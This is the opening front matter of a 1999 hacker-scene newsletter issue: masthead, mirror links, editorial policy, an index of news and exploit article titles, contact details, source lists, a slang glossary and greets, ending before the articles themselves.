💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn35.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 35 Volume 1 1999 Sept 25th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "We see the stars that shine so bright, the stars made for us tonight... and all of it was made for you and me ...." - The Passenger (Iggy Pop) _| _| _| _| _|_| _| _| _| _| _| _| _|_|_|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _|_| _| _| _| _| _|_| _| _| _|_| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _| _| _| _| _|_|_| _|_| _| _| _| _|_|_| _| _| _|_|_|_| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _| _| _|_|_| _| _| _|_|_| http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #35 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #35 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Datashark's rootfest challenge................................... 04.0 .. HOW-TO Beat the ADS on FWP (Free Webpage Providers).............. 05.0 .. Even More Bad News about CESA ................................... 06.0 .. NSI Opens New Email Hole ........................................ 07.0 .. Security Focus Newsletter for September.......................... 08.0 .. PSS Packet Storm Security comes "back" online.................... 09.0 .. British Banks Suffer Blackmail Attempts ......................... 10.0 .. You Have No Privacy On The Net .................................. 11.0 .. Grade Changers Sentenced ........................................ 12.0 .. Another 'hacker' challenge....................................... 13.0 .. Mitnick, Encryption and the Law ................................. 14.0 .. Another 'hacker' challenge....................................... 15.0 .. 9999 Caused at Least One Problem ................................ 16.0 .. Japans Virus Infestations at Record Pace ........................ 17.0 .. Another Word Macro Virus Found .................................. 18.0 .. Croatia: News from Sla5h......................................... 18.1 .. Lawyer: Hackers Have Rights, Too................................. 18.2 .. Cracking for the Man............................................. 18.3 .. Moscow Mayor's Site Hackski'd.................................... 18.4 .. Anti Software Piracy Ads Entice Tattlers......................... 18.5 .. SERBIA THE FIRST CYBERWAR?....................................... 18.6 .. PCWEEK CHALLENGE SITE HACKED..................................... 18.7 .. "Got Root" Got rooted............................................ 18.8 .. Hotmail again.................................................... 19.0 .. ACTIVE X TROJAN.................................................. 20.0 .. ANALYSYS BY JFS - The PCWeek hack (Details)...................... 21.0 .. CALCULATOR IN THE URL............................................ 22.0 .. W97M_SUPPL....................................................... 23.0 .. WHO IS TO "BLAME"................................................ 24.0 .. LPAZ DEFACED..................................................... 25.0 .. VIRUS WRITING OUTLAWED........................................... 26.0 .. NETWARE 5 BUG STRIKES NSS USERS.................................. 27.0 .. TAGGED STUDENTS DEFY BIG BROTHER................................. 28.0 .. HOSPITAL SECURITY ISSUES......................................... 29.0 .. HOTMAIL STILL FAR FROM SECURE.................................... 30.0 .. THE GREAT FIREWALL OF CHINA...................................... 31.0 .. FTC CRACKS INTERNATIONAL PORN RING............................... 32.0 .. WINLINUX2000 Windows or Linux? can't decide? try this ... ....... 33.0 .. YOUR PC COULD BE TAPPED.......................................... 34.0 .. HOW THE FBI BAITED THE NAUGHTON TRAP............................. 35.0 .. HAPPY BIRTHDAY TO LINUX.......................................... 36.0 .. 3com SNMP bug vulnerability...................................... 37.0 .. FreeBSD local DoS on network by unpriviledged user using setsockopt() 38.0 .. BSD:Three ftp daemons in ports vulnerable to attack.............. 39.0 .. Two SuSE 6.2 local root exploits................................. 40.0 .. Microsoft Security Bulletin (MS99-034)........................... 41.0 .. SCO 5.0.5 lpr local root exploit................................. 42.0 .. Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an RS6000 43.0 .. SDI AMD remote exploit for RH linux.............................. 44.0 .. Spoofed Id in Bluestone Sapphire/Web............................. 45.0 .. FreeBSD-SA-99:01: BSD File Flags and Programming Techniques...... 46.0 .. Cisco and Nmap Dos............................................... 47.0 .. Vixie Crontab exploit code....................................... 48.0 .. Exploiting DCOM to gain Administrative rights on Windows NT 4.... 49.0 .. linux tty hijacker by typo/teso.................................. 50.0 .. Various Vulnerabilities in CDE................................... 51.0 .. elm filter program bug........................................... 52.0 .. Accept overflow on Netscape Enterprise Server 3.6 SP2 ........... 53.0 .. Serv-U Ver2.5 FTPd Win9x/NT Exploit.............................. 54.0 .. HPSBUX9908-102 Security Vulnerability in rpc.cmsd................ 55.0 .. IE 5.0 security vulnerabilities - ImportExportFavorites.......... 56.0 .. libtermcap<2.0.8-15 sploit by typo@scene.at...................... 57.0 .. Various buffer overflows in Windows POP3/SMTP servers............ 58.0 .. NetBSD 1.4.1 local DoS........................................... 59.0 .. Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow.... 60.0 .. FreeBSD NFS Exploit.............................................. 61.0 .. Using Nmap for RPC vulnerability................................. 62.0 .. Clarification of the Nmap/Cisco DoS problem...................... 63.0 .. 19 SCO 5.0.5+Skunware98 buffer overflows......................... 64.0 .. SDI anonymous remote exploit for proftpd......................... 65.0 .. KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability 66.0 .. TenFour TFS SMTP 3.2 Buffer Overflow............................. 67.0 .. Solaris 2.7 /usr/bin/mail exploit/buffer overflow vulnerability.. 68.0 .. remote DoS against inetd and ssh................................. 69.0 .. Sun Security Bulletin #00189..................................... 70.0 .. VLAN Security holes in cisco catalyst............................ 71.0 .. Wingates list.................................................... 72.0 .. US Army Uses BO2K ............................................... 73.0 .. India And Pakistan Duke It Out In Cyberspace .................... 74.0 .. Czech Bank Threatened by Cyber Terrorists ....................... 75.0 .. 'Post Mortem' of Nasdaq Released ................................ 76.0 .. DoD Creates Y2K-Alert Levels In case of Sneak Attack ............ 77.0 .. Another Java Hole in Hotmail .................................... 78.0 .. Microsoft Launches New Piracy Initiative ........................ 79.0 .. Online Investors at Serious Risk ................................ 80.0 .. Leapfrog 1.0 Released Today (Source included).................... 81.0 .. Working for the Man ............................................. 82.0 .. NAI Prepares Security Product of the Future ..................... 83.0 .. Mitnick Release Date Set ........................................ 84.0 .. FCC Gives Final Ruling on CALEA ................................. 85.0 .. Year 2000? How About 2038? ...................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a> About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 ����� ��������������������� ISSN� 1004-042X ������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu) ������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) ������ Archivist: Brendan Kehoe ������ Poof Reader:�� Etaion Shrdlu, Jr. ������ Shadow-Archivists: Dan Carosone / Paul Southworth ������������������������� Ralph Sims / Jyrki Kuoppala �������������������������� Ian Dickinson ������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ CRACKING FOR THE MAN (BUS. 3:00 am) 